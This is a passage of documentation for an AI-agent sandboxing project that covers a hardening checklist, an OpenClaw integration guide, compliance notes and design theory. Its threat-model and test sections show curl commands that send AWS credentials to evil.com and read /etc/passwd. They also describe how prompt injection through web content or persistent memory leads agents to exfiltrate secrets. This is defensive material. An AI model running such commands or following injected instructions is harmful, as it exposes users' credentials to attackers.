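            assert_eq!(nu(nu(x, c), c), nu(x, c)); // Idempotent: ν(ν(x)) = ν(x)
            for &y in &all {
                if x <= y {
                    assert!(nu(x, c) <= nu(y, c)); // Monotone: x ≤ y ⇒ ν(x) ≤ ν(y)
                }
            }
        }
    }
    println!("ν laws hold on the 3-level model");
}
```

Exhaustive checks like this are essentially what the property tests do today; the Lean proofs generalize them to the full 12-dimensional lattice.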
Plan
- Lean 4 spec of the lattice structure and ν (small, pure model).
- Proofs of ν laws + meet/join compatibility (minimal theorem set).
- Traceability: map each Rust field to the spec with a short “spec ↔ code” reference table.
- CI gate for proof check (separate job; fails on proof regressions).
What Kani Covers (and doesn’t)
- Kani is used for bounded model checking on Rust implementations.
- Kani runs as a nightly CI job; merge gating is planned once proofs stabilize.
- Kani does not replace theorem proving; it complements the proof layer.
Non-goals (initial)
- Full refinement proofs from Rust to Lean.
- End-to-end OS isolation proofs.
Hardening Checklist (Demo Readiness)
This checklist defines pass/fail criteria for calling the demo “fully hardened,” including the goal of a static envelope around a dynamic agent. Each item includes a current status and evidence pointer.
Status key: DONE, PARTIAL, TODO.
1) Enforcement Path (Policy -> Physics)
- All side effects go through nucleus-tool-proxy
  - Pass: CLI/tool adapters can only execute file/command/network ops via the proxy API.
  - Current: DONE (CLI uses node + MCP; no unsafe direct mode).
  - Evidence: `crates/nucleus-cli/src/run.rs`
- CLI hard-fail if not enforced
  - Pass: No unsafe flags; enforced mode is the default path.
  - Current: DONE (unsafe flag removed).
  - Evidence: `crates/nucleus-cli/src/run.rs`
- Node API requires signed requests
  - Pass: nucleus-node rejects unsigned HTTP/gRPC calls.
  - Current: DONE (auth secret required).
  - Evidence: `crates/nucleus-node/src/main.rs`, `crates/nucleus-node/src/auth.rs`
2) Network Egress Control
- Default-deny enforced for Firecracker pods
  - Pass: netns iptables default DROP even without `spec.network`.
  - Current: DONE.
  - Evidence: `crates/nucleus-node/src/main.rs`, `crates/nucleus-node/src/net.rs`
- IPv6 is denied or disabled
  - Pass: ip6tables mirrors default-deny OR guest IPv6 is disabled.
  - Current: DONE (guest IPv6 disabled at boot).
  - Evidence: `crates/nucleus-node/src/main.rs`
- DNS allowlisting
  - Pass: explicit hostname allowlist enforced (ipset/dnsmasq or equivalent).
  - Current: DONE (dnsmasq proxy with pinned hostname resolution).
  - Evidence: `crates/nucleus-node/src/net.rs`, `crates/nucleus-spec/src/lib.rs`
3) Approvals (AskFirst)
- Approvals are cryptographically signed
  - Pass: approvals require signed tokens with nonce + expiry, verified in proxy.
  - Current: DONE (approval secret required; nonce + expiry enforced).
  - Evidence: `crates/nucleus-tool-proxy/src/main.rs`
- Approval replay protection
  - Pass: nonce cache + expiry enforced for all approvals.
  - Current: DONE (nonce required for approvals).
  - Evidence: `crates/nucleus-tool-proxy/src/main.rs`
4) Isolation (VM Boundary)
- Rootfs is read-only
  - Pass: image configured read-only; scratch is explicit and limited.
  - Current: DONE (when image spec requests it).
  - Evidence: `scripts/firecracker/build-rootfs.sh`, `crates/nucleus-node/src/main.rs`
- Guest has no extra services
  - Pass: init runs tool-proxy only.
  - Current: DONE.
  - Evidence: `crates/nucleus-guest-init/src/main.rs`
- Seccomp enforced
  - Pass: seccomp profile configured and verified post-spawn.
  - Current: DONE (config applied via `apply_seccomp_flags`; post-spawn `/proc/{pid}/status` verification checks mode=2).
  - Evidence: `crates/nucleus-node/src/main.rs` (verify_seccomp_active, apply_seccomp_flags), `crates/nucleus-spec/src/lib.rs` (SeccompSpec)
4.5) Monotone Security Posture (Immutability)
- No privilege relaxation after creation
  - Pass: permission state can only tighten or the pod is terminated.
  - Current: DONE (Verus-proven E1-E3 enforcement boundary + runtime debug_assert).
  - Evidence: `crates/portcullis-verified/src/lib.rs` (E1: exposure monotonicity, E2: trace monotonicity, E3: denial monotonicity), `crates/portcullis/src/guard.rs` (debug_assert in execute_and_record)
- Network policy drift detection
  - Pass: host checks iptables drift and fails closed on deviation.
  - Current: DONE.
  - Evidence: `crates/nucleus-node/src/net.rs`, `crates/nucleus-node/src/main.rs`
- Seccomp immutability documented
  - Pass: docs explicitly state seccomp is fixed at Firecracker spawn.
  - Current: DONE.
  - Evidence: `docs/architecture/overview.md`, `README.md`
5) Audit + Integrity
- Audit log signatures
  - Pass: log entries are signed; verification tool exists.
  - Current: DONE (signatures enforced; verifier available).
  - Evidence: `crates/nucleus-tool-proxy/src/main.rs`, `crates/nucleus-audit/src/main.rs`
- Remote append-only storage
  - Pass: logs shipped to append-only store (or immutability proof).
  - Current: DONE (S3AuditBackend with `if_none_match("*")` append-only semantics; behind `remote-audit` feature flag).
  - Evidence: `crates/portcullis/src/s3_audit_backend.rs`, `crates/nucleus-spec/src/lib.rs` (AuditSinkSpec)
6) Formal Assurance Gates
- ν laws proven in CI
  - Pass: Verus/Kani proof jobs run in CI and block merges on failure.
  - Current: DONE (297 Verus proofs + 14 Kani harnesses; both are required merge checks on main).
  - Evidence: `.github/workflows/verus.yml`, `.github/workflows/kani-nightly.yml`, `crates/portcullis-verified/src/lib.rs`, `crates/portcullis/src/kani.rs`
- Fuzzing in CI
  - Pass: cargo-fuzz targets run with time budget; known bypasses blocked.
  - Current: DONE (3 fuzz targets × 30s; Fuzz is a required merge check on main).
  - Evidence: `fuzz/`, `.github/workflows/ci.yml`
6.5) Web Ingress Control
- MIME type gating on web_fetch
  - Pass: only text and structured data MIME types are allowed; binary formats blocked.
  - Current: DONE (allowlist: text/*, application/json, application/xml, etc.).
  - Evidence: `crates/nucleus-tool-proxy/src/main.rs` (web_fetch handler)
- Exposure provenance on fetched content
  - Pass: all web-fetched content is tagged with `X-Nucleus-Exposure: UntrustedContent` + source domain.
  - Current: DONE.
  - Evidence: `crates/nucleus-tool-proxy/src/main.rs` (response headers)
- URL pattern allowlisting
  - Pass: per-pod URL pattern allowlist via `NetworkSpec.url_allow`.
  - Current: DONE (glob-style matching; empty = allow all permitted domains).
  - Evidence: `crates/nucleus-spec/src/lib.rs` (NetworkSpec), `crates/nucleus-tool-proxy/src/main.rs`
7) Demo Verification Script
- Network policy test
  - Pass: `scripts/firecracker/test-network.sh` passes with allow/deny.
  - Current: DONE (manual).
  - Evidence: `scripts/firecracker/test-network.sh`
Exit Criteria (Full Hardened Demo)
All items above at DONE, and:
- Enforced CLI path is the default.
- IPv6 + DNS allowlisting are covered.
- Signed approvals + audit verification are implemented.
- CI gates (Kani + fuzz + integration tests) are in place.
Nucleus Use Cases
Nucleus provides hardware-isolated sandboxing for AI agents. While the architecture is general-purpose, certain use cases benefit most from defense-in-depth isolation.
Why Now
January 2026 brought AI agent security into sharp focus:
- Moltbook breach (Jan 31): Unsecured database allowed hijacking of 770K+ AI agents
- Palo Alto “Uninhabitable State” research: Identified the dangerous combination of private data access + untrusted content + external communication
- OpenClaw adoption: 100K+ GitHub stars, running in enterprise environments with root filesystem access
The industry is deploying agents faster than security practices can evolve. Nucleus provides a hardened execution layer that doesn’t require perfect configuration—isolation is architectural, not optional.
Use Cases
| Use Case | Risk Profile | Nucleus Benefit |
|---|---|---|
| OpenClaw Hardening | Critical - full system access | Break the uninhabitable state |
| Claude Code Sandbox | High - code execution | Isolated tool execution |
| MCP Server Isolation | Medium - tool calls | Per-tool sandboxing |
| Enterprise AI Agents | Variable - compliance | Audit trails, NIST compliance |
Quick Comparison
┌─────────────────────────────────────────────────────────────────┐
│ Without Nucleus │
├─────────────────────────────────────────────────────────────────┤
│ AI Agent ──► Tools ──► Host Filesystem ──► Network ──► World │
│ │ │ │
│ └── Credentials, API keys, browser sessions all accessible │
└─────────────────────────────────────────────────────────────────┘
┌─────────────────────────────────────────────────────────────────┐
│ With Nucleus │
├─────────────────────────────────────────────────────────────────┤
│ AI Agent (host) ──► nucleus-node ──► Firecracker VM │
│ │ │ │
│ │ API keys stay here Only /workspace visible │
│ │ Network egress filtered │
│ │ No shell escape possible │
│ │ │ │
│ └────────── Signed results ◄─────────┘ │
└─────────────────────────────────────────────────────────────────┘
Getting Started
# Install
cargo install nucleus-node
cargo install nucleus-cli
# Setup (macOS with Lima VM, or native Linux)
nucleus setup
# Verify
nucleus doctor
See individual use case docs for integration guides.
Hardening OpenClaw with Nucleus
“There is no ‘perfectly secure’ setup.” — OpenClaw Security Documentation
We disagree. Security should be architectural, not aspirational.
Status Update: February 2026
OpenAI acquired OpenClaw on February 14, 2026. The project’s future licensing and API stability are uncertain. Nucleus’s value proposition is framework-agnostic isolation — it works with OpenClaw, but also with any agent framework that executes tools (Claude Code, Cursor, Windsurf, custom agents, etc.). If OpenClaw becomes closed-source or OpenAI-proprietary, nucleus remains unaffected.
The Problem: January 2026
OpenClaw (formerly Moltbot/Clawdbot) has become one of the fastest-growing open source projects in history—100K+ GitHub stars in two months. It’s deployed in enterprise environments, managing calendars, sending messages, and automating workflows.
It also requires:
- Root filesystem access
- Stored credentials and API keys
- Browser sessions with authenticated cookies
- Unrestricted network access
On January 31, 2026, the Moltbook social network for AI agents suffered a critical breach. An unsecured database allowed anyone to hijack any of the 770,000+ agents on the platform, injecting commands directly into their sessions.
This wasn’t a sophisticated attack. It was a configuration oversight in a system designed to be “configured correctly by the operator.”
The Uninhabitable State
Palo Alto Networks identified why OpenClaw’s architecture is fundamentally dangerous:
| Element | Why It’s Dangerous | OpenClaw Default |
|---|---|---|
| Private data access | Agent can read credentials, keys, PII | Full filesystem access |
| Untrusted content | Prompt injection via web, attachments | Processed on host |
| External communication | Exfiltration channel | Unrestricted outbound |
When all three combine, a single prompt injection can exfiltrate your SSH keys, API tokens, or browser sessions to an attacker-controlled server.
The Fourth Risk: Persistent Memory
OpenClaw’s memory system compounds the danger. Malicious payloads don’t need immediate execution—fragments can accumulate across sessions and combine later. By the time the attack triggers, the injection point is buried in conversation history.
How Nucleus Breaks the Uninhabitable State
Nucleus interposes a Firecracker microVM between the AI agent and tool execution:
┌─────────────────────────────────────────────────────────────────┐
│ OpenClaw Gateway (Host) │
│ ├── Claude/GPT API credentials ← Never enter sandbox │
│ ├── User's browser sessions ← Never enter sandbox │
│ └── ~/.openclaw/credentials/ ← Never enter sandbox │
│ │
│ Tool Request: "read file /etc/passwd" │
│ │ │
│ ▼ │
│ ┌─────────────────────────────────────────────────────────────┐│
│ │ nucleus-node ││
│ │ ├── HMAC-SHA256 signature verification ││
│ │ ├── Lattice-guard permission check ││
│ │ └── Approval token validation ││
│ └─────────────────────────────────────────────────────────────┘│
│ │ │
│ ▼ │
│ ┌─────────────────────────────────────────────────────────────┐│
│ │ Firecracker microVM (isolated) ││
│ │ ├── Sees only /workspace (mapped directory) ││
│ │ ├── No access to host filesystem ││
│ │ ├── Network namespace: egress allowlist only ││
│ │ └── Read-only rootfs, ephemeral scratch ││
│ └─────────────────────────────────────────────────────────────┘│
│ │ │
│ ▼ │
│ Result: "Permission denied" or sandboxed file contents │
└─────────────────────────────────────────────────────────────────┘
Uninhabitable State Mitigation
| Uninhabitable State Element | Nucleus Mitigation |
|---|---|
| Private data access | VM sees only /workspace, not host filesystem |
| Untrusted content | Processed inside VM, cannot escape to host |
| External communication | Network namespace with egress allowlist |
| Persistent memory | Lattice-guard detects uninhabitable state combinations |
Integration Guide
Prerequisites
- Linux host with KVM, or macOS with Lima VM (M3+ for nested virt)
- OpenClaw gateway running
Step 1: Install Nucleus
# From source
git clone https://github.com/coproduct-opensource/nucleus
cd nucleus
cargo install --path crates/nucleus-node
cargo install --path crates/nucleus-cli
# Setup (generates secrets, configures VM)
nucleus setup
nucleus doctor # Verify installation
Step 2: Configure OpenClaw Exec Backend
In your OpenClaw configuration (~/.openclaw/config.yaml):
exec:
backend: nucleus
nucleus:
endpoint: "http://127.0.0.1:8080"
workspace: "/path/to/safe/workspace"
timeout_seconds: 300
# Permission profile (see nucleus docs)
profile: "openclaw-restricted"
Step 3: Define Permission Profile
Create ~/.config/nucleus/profiles/openclaw-restricted.toml:
[filesystem]
# Only allow access to workspace
allowed_paths = ["/workspace"]
denied_paths = ["**/.env", "**/*.pem", "**/*secret*"]
[network]
# Allowlist for OpenClaw's typical integrations
allowed_hosts = [
"api.openai.com",
"api.anthropic.com",
"api.github.com",
"*.googleapis.com",
]
denied_hosts = ["*"] # Deny by default
[capabilities]
# No shell execution, no privilege escalation
allow_shell = false
allow_sudo = false
allow_network_bind = false
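The `allowed_hosts` patterns above imply suffix-style wildcard matching. A sketch of one plausible matcher (illustrative only, not nucleus's actual implementation; note the guard against suffix-spoofing hostnames):

```rust
/// Match a hostname against allowlist patterns like "*.googleapis.com".
/// Illustrative sketch of suffix-style matching.
fn host_allowed(host: &str, allow: &[&str]) -> bool {
    allow.iter().any(|pat| {
        if let Some(suffix) = pat.strip_prefix("*.") {
            // Match the bare domain or any subdomain, but require the dot
            // boundary so "googleapis.com.evil.com" cannot spoof a match.
            host == suffix || host.ends_with(&format!(".{suffix}"))
        } else {
            host == *pat
        }
    })
}

fn main() {
    let allow = ["api.github.com", "*.googleapis.com"];
    assert!(host_allowed("api.github.com", &allow));
    assert!(host_allowed("storage.googleapis.com", &allow));
    assert!(!host_allowed("evil.com", &allow));
    assert!(!host_allowed("googleapis.com.evil.com", &allow)); // spoof blocked
}
```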
Step 4: Start Services
# Terminal 1: Start nucleus-node
nucleus-node --config ~/.config/nucleus/config.toml
# Terminal 2: Start OpenClaw gateway (will use nucleus backend)
openclaw gateway start
Step 5: Verify Isolation
Test that the sandbox is working:
# This should fail - /etc/passwd is outside workspace
openclaw exec "cat /etc/passwd"
# Expected: Permission denied
# This should work - workspace access allowed
openclaw exec "ls /workspace"
# Expected: Directory listing
# This should fail - network not in allowlist
openclaw exec "curl http://evil.com/exfil"
# Expected: Network error or timeout
Security Guarantees
| Guarantee | Mechanism |
|---|---|
| Filesystem isolation | Firecracker VM with mapped /workspace only |
| Network isolation | Linux network namespace, iptables egress rules |
| Request authenticity | HMAC-SHA256 signing of all requests |
| Approval audit | Cryptographically chained audit log |
| Secret protection | Credentials in macOS Keychain, never in VM |
| **Uninhabitable state detection** | Lattice-guard alerts on dangerous combinations |
What Nucleus Does NOT Protect Against
Be aware of limitations:
- Prompt injection itself — Nucleus sandboxes execution, not the LLM
- Data in workspace — Files explicitly shared are accessible
- Approved network targets — Allowlisted hosts can still receive exfiltrated data
- Side-channel attacks — Timing, power analysis not mitigated
- Malicious workspace files — If you put secrets in workspace, they’re exposed
Nucleus is defense-in-depth, not a silver bullet. It dramatically reduces blast radius but cannot make an unsafe agent safe.
Comparison: Before and After
Before: OpenClaw Default
Attack: Prompt injection via web search result
→ Agent executes: curl http://evil.com/x?key=$(cat ~/.aws/credentials)
→ Result: AWS credentials exfiltrated
Attack: Malicious attachment
→ Agent executes: python malware.py
→ Result: Ransomware on host system
After: With Nucleus
Attack: Prompt injection via web search result
→ Agent requests: curl http://evil.com/x?key=$(cat ~/.aws/credentials)
→ nucleus-node: Network destination not in allowlist
→ nucleus-node: ~/.aws/credentials not in allowed paths
→ Result: Request denied, logged, alert raised
Attack: Malicious attachment
→ Agent requests: python malware.py
→ nucleus-node: Executes in isolated VM
→ VM: No access to host filesystem
→ VM: No network egress to C2 server
→ Result: Malware contained, host unaffected
Framework-Agnostic Integration
While this guide focuses on OpenClaw, Nucleus provides the same isolation guarantees for any agent framework that executes tools on a host system:
| Framework | Integration Method | Status |
|---|---|---|
| OpenClaw | TypeScript plugin (openclaw-nucleus-plugin) | Production |
| Custom Rust agents | nucleus-sdk crate (Nucleus::intent() API) | Production |
| Any HTTP agent | REST API to nucleus-node | Production |
| MCP-compatible agents | MCP tool server (planned) | Roadmap |
The core principle is the same regardless of framework: tool execution happens inside an isolated Firecracker microVM, and the permission lattice governs what’s allowed.
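As an illustration of the request-signing half of the HTTP path, here is a minimal HMAC-SHA256 signer in Python. The canonicalization and the 32-byte placeholder secret are assumptions for this sketch; the real scheme lives in the `nucleus-client` signer helpers.

```python
import hmac, hashlib, json

def sign_request(secret: bytes, body: bytes) -> str:
    """HMAC-SHA256 over the raw request body, hex-encoded (illustrative)."""
    return hmac.new(secret, body, hashlib.sha256).hexdigest()

def verify_request(secret: bytes, body: bytes, signature: str) -> bool:
    # Constant-time comparison to avoid timing side channels.
    return hmac.compare_digest(sign_request(secret, body), signature)

secret = b"\x00" * 32  # placeholder; real secrets are 32 random bytes
body = json.dumps({"tool": "file_read", "target": "/workspace/report.csv"}).encode()
sig = sign_request(secret, body)
assert verify_request(secret, body, sig)
assert not verify_request(secret, body + b"tampered", sig)
```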
Further Reading
- Nucleus Architecture Overview
- Lattice-Guard Permission Model
- Audit Log Verification
- Nucleus SDK
- OpenClaw Security Documentation (may change post-acquisition)
- Palo Alto Networks: AI Agent Security Research
Enterprise AI Agents
Compliance-ready AI agent execution with audit trails and NIST-aligned security.
Enterprise Requirements
| Requirement | Challenge | Nucleus Solution |
|---|---|---|
| Audit trails | Prove what agent did and when | Cryptographic hash-chained logs |
| Data isolation | PII/PHI can’t leak to LLM providers | Execution in air-gapped VM |
| Least privilege | Agents shouldn’t have admin access | Capability-based permissions |
| Secret management | API keys must be rotated, protected | Keychain integration, 90-day rotation |
| Incident response | Forensic analysis after breach | Verifiable audit logs |
Compliance Alignment
SOC 2
| Control | Nucleus Feature |
|---|---|
| CC6.1 - Logical access | Lattice-guard permission boundaries |
| CC6.6 - System boundaries | Firecracker VM isolation |
| CC7.2 - Security events | nucleus-audit logging |
HIPAA
| Safeguard | Nucleus Feature |
|---|---|
| Access controls | Per-agent permission profiles |
| Audit controls | Cryptographic log verification |
| Integrity controls | Read-only rootfs, signed requests |
| Transmission security | HMAC-SHA256 request signing |
NIST SP 800-57 (Key Management)
| Requirement | Implementation |
|---|---|
| Key generation | 32-byte cryptographically random secrets |
| Key storage | macOS Keychain (hardware-backed on Apple Silicon) |
| Key rotation | 90-day tracking with warnings |
| Key destruction | Secure deletion via Keychain API |
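The 90-day rotation tracking can be sketched as a simple age check. The 14-day warning window and status labels are assumptions for illustration, not the shipped policy.

```python
from datetime import date, timedelta

ROTATION_PERIOD = timedelta(days=90)
WARNING_WINDOW = timedelta(days=14)  # assumed warning lead time

def rotation_status(created: date, today: date) -> str:
    """Classify a key's age against the 90-day rotation policy."""
    age = today - created
    if age >= ROTATION_PERIOD:
        return "expired"
    if age >= ROTATION_PERIOD - WARNING_WINDOW:
        return "warn"
    return "ok"

assert rotation_status(date(2026, 1, 1), date(2026, 2, 1)) == "ok"
assert rotation_status(date(2026, 1, 1), date(2026, 3, 25)) == "warn"
assert rotation_status(date(2026, 1, 1), date(2026, 4, 15)) == "expired"
```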
Architecture: Enterprise Deployment
┌─────────────────────────────────────────────────────────────────┐
│ Enterprise Network │
│ │
│ ┌──────────────┐ ┌──────────────┐ ┌──────────────┐ │
│ │ AI Agent │────▶│ nucleus-node │────▶│ Firecracker │ │
│ │ (internal) │ │ cluster │ │ VM pool │ │
│ └──────────────┘ └──────────────┘ └──────────────┘ │
│ │ │ │ │
│ │ ▼ │ │
│ │ ┌──────────────┐ │ │
│ │ │ nucleus-audit│ │ │
│ │ │ (SIEM) │ │ │
│ │ └──────────────┘ │ │
│ │ │ │ │
│ ▼ ▼ ▼ │
│ ┌─────────────────────────────────────────────────────────────┐│
│ │ Audit Log Store ││
│ │ • Immutable append-only ││
│ │ • SHA-256 hash chain ││
│ │ • 7-year retention ││
│ └─────────────────────────────────────────────────────────────┘│
└─────────────────────────────────────────────────────────────────┘
Audit Log Format
{
"timestamp": "2026-01-31T14:23:45.123Z",
"sequence": 1847,
"previous_hash": "a3f2b1c4...",
"event": {
"type": "tool_execution",
"agent_id": "agent-prod-047",
"tool": "file_read",
"target": "/workspace/report.csv",
"result": "success",
"bytes_returned": 4523
},
"signature": "hmac-sha256:e7d4a2f1..."
}
Verify log integrity:
nucleus-audit verify /var/log/nucleus/audit.log
# ✓ 1847 entries verified
# ✓ Hash chain intact
# ✓ No gaps detected
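The hash-chain property that `nucleus-audit verify` checks can be demonstrated in a few lines. The canonicalization below (sorted-key JSON) is an assumption for the sketch; the point is that editing any earlier entry breaks every later `previous_hash` link.

```python
import hashlib, json

def entry_hash(entry: dict) -> str:
    """Canonical SHA-256 of one log entry (sorted-key JSON; illustrative)."""
    return hashlib.sha256(json.dumps(entry, sort_keys=True).encode()).hexdigest()

def append(log: list, event: dict) -> None:
    prev = entry_hash(log[-1]) if log else "0" * 64
    log.append({"sequence": len(log), "previous_hash": prev, "event": event})

def verify(log: list) -> bool:
    """Recompute the chain; tampering or gaps break a later link."""
    for i, entry in enumerate(log):
        expected = entry_hash(log[i - 1]) if i else "0" * 64
        if entry["previous_hash"] != expected or entry["sequence"] != i:
            return False
    return True

log = []
append(log, {"type": "tool_execution", "tool": "file_read"})
append(log, {"type": "tool_execution", "tool": "git_push"})
assert verify(log)
log[0]["event"]["tool"] = "file_write"   # tamper with history
assert not verify(log)
```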
Deployment Options
On-Premises
# Kubernetes deployment
helm install nucleus nucleus/nucleus-node \
--set replicas=3 \
--set audit.storage=s3://company-audit-logs \
--set secrets.backend=vault
Cloud (AWS/GCP/Azure)
Nucleus runs on any Linux VM with KVM support:
- AWS: metal instances or Nitro-based (`.metal` suffix)
- GCP: N2 with nested virtualization enabled
- Azure: DCsv2/DCsv3 with nested virtualization
Getting Started
- Security review: Share architecture docs with InfoSec
- Pilot deployment: Single agent, non-production data
- Audit integration: Connect nucleus-audit to SIEM
- Production rollout: Gradual migration with monitoring
Contact: security@coproduct.dev for enterprise support.
Terminology
This document captures brief, working definitions for terms used in the codebase and roadmap.
Firecracker
Firecracker is an open-source microVM monitor (AWS) focused on minimal device emulation, fast startup, and small memory footprint, exposing a REST control API and vsock/virtio devices for guest I/O. Source: https://firecracker-microvm.github.io/ Releases: https://github.com/firecracker-microvm/firecracker/releases
KVM (Kernel-based Virtual Machine)
KVM is a full virtualization solution in the Linux kernel that relies on hardware virtualization extensions (Intel VT or AMD-V) and provides kernel modules (kvm.ko plus CPU-specific modules) for running unmodified guest OSes. Source: https://linux-kvm.org/page/Main_Page
seccomp (Seccomp BPF)
Linux seccomp allows a process to filter its own system calls using BPF programs, reducing exposed kernel attack surface; it is a building block, not a full sandbox. Source: https://docs.kernel.org/userspace-api/seccomp_filter.html
cgroups (Control Groups, v2)
cgroup v2 provides a unified, hierarchical resource control interface (CPU, memory, I/O, etc.) with consistent controller semantics across the system. Source: https://docs.kernel.org/admin-guide/cgroup-v2.html
vsock (AF_VSOCK)
The VSOCK address family provides host<->guest communication that is independent of the VM’s network configuration, commonly used by guest agents and hypervisor services. Source: https://man7.org/linux/man-pages/man7/vsock.7.html
cap-std
cap-std provides a capability-based version of the Rust standard library, where access to filesystem/network/time resources is represented by values (capabilities) rather than ambient global access.
Source: https://docs.rs/crate/cap-std/latest
Kani
Kani is a bit-precise model checker for Rust that can verify safety and correctness properties by exploring possible inputs and checking assertions/overflows/panics. Source: https://github.com/model-checking/kani
Temporal
Temporal is a scalable, reliable workflow runtime for durable execution of application code, enabling workflows that recover from failures without losing state. Source: https://docs.temporal.io/temporal
Model Context Protocol (MCP)
MCP is a JSON-RPC based protocol for exposing tools and context to AI applications via standardized client/server roles and capability negotiation. Source: https://modelcontextprotocol.io/specification/2025-11-25/basic
Temporal workflow sketch for nucleus pods
Goal: use Temporal to sequence agent steps (LangGraph-like) while Firecracker pods provide isolation.
Workflow outline
- Create pod (activity: call nucleus-node `/v1/pods` or gRPC `CreatePod`).
- Wait for pod ready (activity: poll `/v1/pods` or check proxy announce).
- Run step(s) (activity: call tool-proxy `/v1/run`, `/v1/read`, `/v1/write`).
- Approval gating (signal: `ApprovalGranted` -> activity: call `/v1/approve`).
- Collect logs (activity: node `/v1/pods/:id/logs`).
- Tear down (activity: cancel pod).
Example pseudo-flow
workflow AgentFlow(input) {
pod = activity CreatePod(input.spec)
activity WaitReady(pod)
for step in input.graph:
if step.requiresApproval:
await signal ApprovalGranted
activity Approve(pod.proxy, step.operation)
result = activity RunTool(pod.proxy, step.toolCall)
activity RecordResult(result)
logs = activity FetchLogs(pod.id)
activity CancelPod(pod.id)
return { result, logs }
}
Recommended Temporal config
- Each activity has a short timeout + retry policy.
- Workflow uses idempotent activities (CreatePod returns existing pod if retried).
- Signals are authenticated (signature/HMAC) to prevent fake approvals.
- Use a per-pod workflow ID (pod UUID) for traceability.
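The idempotency point above can be sketched with an in-memory stand-in for the activity layer: `CreatePod` keyed by workflow ID, so a Temporal retry returns the existing pod instead of spawning a duplicate. Names here are illustrative, not the Temporal SDK API.

```python
# In-memory stand-in for pod bookkeeping; a real activity would call
# nucleus-node and persist the mapping.
_pods: dict[str, dict] = {}

def create_pod(workflow_id: str, spec: dict) -> dict:
    """Idempotent: retries with the same workflow_id return the same pod."""
    if workflow_id not in _pods:
        _pods[workflow_id] = {"pod_id": f"pod-{workflow_id}", "spec": spec}
    return _pods[workflow_id]

first = create_pod("wf-123", {"image": "rootfs.img"})
retry = create_pod("wf-123", {"image": "rootfs.img"})  # simulated activity retry
assert first is retry  # no duplicate pod created
```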
Minimal integration points
- Activity stubs for `CreatePod`, `WaitReady`, `RunTool`, `Approve`, `FetchLogs`, `CancelPod`.
- HTTP client that signs requests (HMAC headers) to node/proxy.
- Workflow state stores pod ID + proxy address.
Signer helpers
- Rust: `crates/nucleus-client` provides `sign_http_headers` / `sign_grpc_headers`.
- TypeScript: `examples/sign_request.ts` contains a minimal signer.
Theoretical Foundations
Nucleus is built on ideas from type theory, category theory, and programming language semantics. This document explains the “why” behind the design.
The Core Question
How do you give an AI agent enough capability to be useful while preventing it from exfiltrating your secrets?
This is not a data transformation problem (pipelines). It’s a capability tracking problem. The permission state isn’t data flowing through—it’s a constraint on what effects can even occur.
Graded Monads for Permission Tracking
The permission lattice is best understood as a graded monad (also called indexed or parameterized monad).
-- The grade 'p' is the permission lattice
newtype Sandbox p a = Sandbox (Policy p -> IO a)
-- Operations require specific capabilities
readFile :: HasCap p ReadFiles => Path -> Sandbox p String
webFetch :: HasCap p WebFetch => URL -> Sandbox p Response
gitPush :: HasCap p GitPush => Ref -> Sandbox p ()
-- Sequencing composes permissions via lattice MEET
(>>=) :: Sandbox p a -> (a -> Sandbox q b) -> Sandbox (p ∧ q) b
When you sequence operations, their permission requirements compose via the lattice meet operation. The resulting type carries the combined constraints.
Why Meet, Not Join?
Meet (∧) gives the greatest lower bound—the most restrictive combination. This ensures:
- Monotonicity: Delegated permissions can only tighten, never relax
- Least privilege: Combined operations get the intersection of capabilities
- Compositionality: Order of composition doesn’t matter (meet is commutative)
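A toy model makes these properties concrete: flatten one slice of the lattice to a set of capabilities, so that meet becomes set intersection (an assumption for illustration; the real lattice is a 12-dimensional product with 3-level states).

```python
# Permissions as capability sets; meet = intersection (greatest lower bound).
def meet(p: frozenset, q: frozenset) -> frozenset:
    return p & q

p = frozenset({"read_files", "web_fetch", "git_push"})
q = frozenset({"read_files", "web_fetch"})

combined = meet(p, q)
assert combined == frozenset({"read_files", "web_fetch"})
assert meet(p, q) == meet(q, p)             # commutative
assert meet(p, q) <= p and meet(p, q) <= q  # never exceeds either input
```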
The Uninhabitable State as a Type-Level Constraint
The “uninhabitable state” (private data + untrusted content + exfiltration) is not a runtime check bolted on. It’s a type-level invariant.
-- When all three legs are present, the type changes
type family UninhabitableGuard p where
  UninhabitableGuard p = If (Has UninhabitableState p)
                            (RequiresApproval p)
                            p
-- Operations that can exfiltrate check this at the type level
gitPush :: UninhabitableGuard p ~ p => Ref -> Sandbox p ()
In Rust, we approximate this with runtime normalization (the ν function), but the intent is the same: certain capability combinations change the type of operations from “autonomous” to “requires approval.”
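The runtime approximation can be sketched directly from the exposure lattice described earlier: three booleans whose join is per-field OR (hence monotone), with the uninhabitable state reached only when all three legs co-occur. Class and field names mirror the documentation, not the Rust implementation.

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class Exposure:
    """The 3-bool exposure semilattice; join is per-field OR and is monotone."""
    private_data: bool = False
    untrusted_content: bool = False
    exfil_vector: bool = False

    def join(self, other: "Exposure") -> "Exposure":
        return Exposure(
            self.private_data or other.private_data,
            self.untrusted_content or other.untrusted_content,
            self.exfil_vector or other.exfil_vector,
        )

    @property
    def uninhabitable(self) -> bool:
        return self.private_data and self.untrusted_content and self.exfil_vector

# Exposure accumulates monotonically as the trace grows; it never decreases.
e = Exposure()
e = e.join(Exposure(private_data=True))        # agent read a credential
e = e.join(Exposure(untrusted_content=True))   # agent fetched a web page
assert not e.uninhabitable
e = e.join(Exposure(exfil_vector=True))        # agent gained a network sink
assert e.uninhabitable  # all three legs present: now requires approval
```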
Free Monads for the Three-Player Game
The Strategist/Reconciler/Validator pattern maps to the free monad pattern: separate the description of a computation from its interpretation.
-- The functor describing sandbox operations
data SandboxF next
= ReadFile Path (String -> next)
| WriteFile Path String next
| RunBash Command (Output -> next)
| WebFetch URL (Response -> next)
| GitPush Ref next
-- Free monad: a program is a sequence of operations
type SandboxProgram = Free SandboxF
-- Strategist: builds the program (pure)
strategist :: Issue -> SandboxProgram Plan
-- Reconciler: interprets with effects (IO)
reconciler :: SandboxProgram a -> Policy -> IO a
-- Validator: inspects the trace (pure)
validator :: Trace -> Verdict
This separation buys us:
- Testability: Strategist output can be inspected without running effects
- Replay: Programs can be re-interpreted against different policies
- Auditing: The program structure is data, not opaque closures
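The separation can be shown in miniature: a program is plain data, and two interpreters give it different meanings, one pure (validation) and one effectful (execution, stubbed here). Operation names are taken from the functor above; everything else is an illustrative assumption.

```python
# Program-as-data: each step names an operation; interpreters decide meaning.
PROGRAM = [
    ("read_file", "/workspace/input.csv"),
    ("run_bash", "wc -l /workspace/input.csv"),
    ("git_push", "refs/heads/main"),
]

def validate(program, policy: set) -> list:
    """Pure 'Validator': list policy violations without executing anything."""
    return [(op, arg) for op, arg in program if op not in policy]

def interpret(program, policy: set) -> list:
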